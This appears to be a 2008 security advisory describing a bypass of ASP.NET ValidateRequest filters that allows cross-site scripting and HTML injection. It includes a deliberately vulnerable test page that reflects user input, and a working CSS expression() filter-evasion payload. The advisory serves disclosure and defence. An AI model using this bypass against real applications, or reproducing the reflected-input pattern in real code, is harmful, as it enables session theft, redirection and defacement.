Microsoft ASP.NET ValidateRequest Filters Bypassing Allows XSS And HTML Injection Attacks
29 Aug. 2008
Summary
By understanding how ASP .NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP .NET ValidateRequest filters and perform XSS and HTML injection even against systems protected with the MS07-040 patch. This patch fixed the payload reported in ProCheckUp security bulletin PR07-03.
It was possible to perform redirect, cookie theft, and unrestricted HTML injection attacks against an ASP .NET application setup in a test environment. ProCheckUp has also found this issue to be exploitable while carrying out penetration tests on several customer's live environments.
Proof of concept:
In the following examples, 'test3.aspx' is a script that solely relies on ASP .NET ValidateRequest filters, and returns user-supplied input back to the browser.
<html>
<head><title>test3.aspx</title><script>document.cookie='PCUSESSIONID=stealme'</script></head>
<body>
<form action="test3.aspx" method="get">
Your name: <input type="text" name="fname" size="20" />
<input type="submit" value="Submit" />
</form>
<%
dim fname
fname=Request.QueryString("fname")
If fname<>"" Then
Response.Write("Hello " & "<tagname " & fname & "!<br />")
Response.Write("How are you today?")
End If
%>
</body>
</html>
Alert box injection - simply provided for testing purposes (may cause DoS issues on Internet Explorer)
http://target.foo/test3.aspx?fname=
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
Consequences:
Attackers can potentially launch XSS and HTML injection attacks against vulnerable applications that solely rely on ASP .NET ValidateRequest filters. Such code would run within the context of the target domain.
This type of attack can result in defacement of the target site, or the redirection of confidential information (i.e.: session IDs or passwords) to unauthorised third parties.
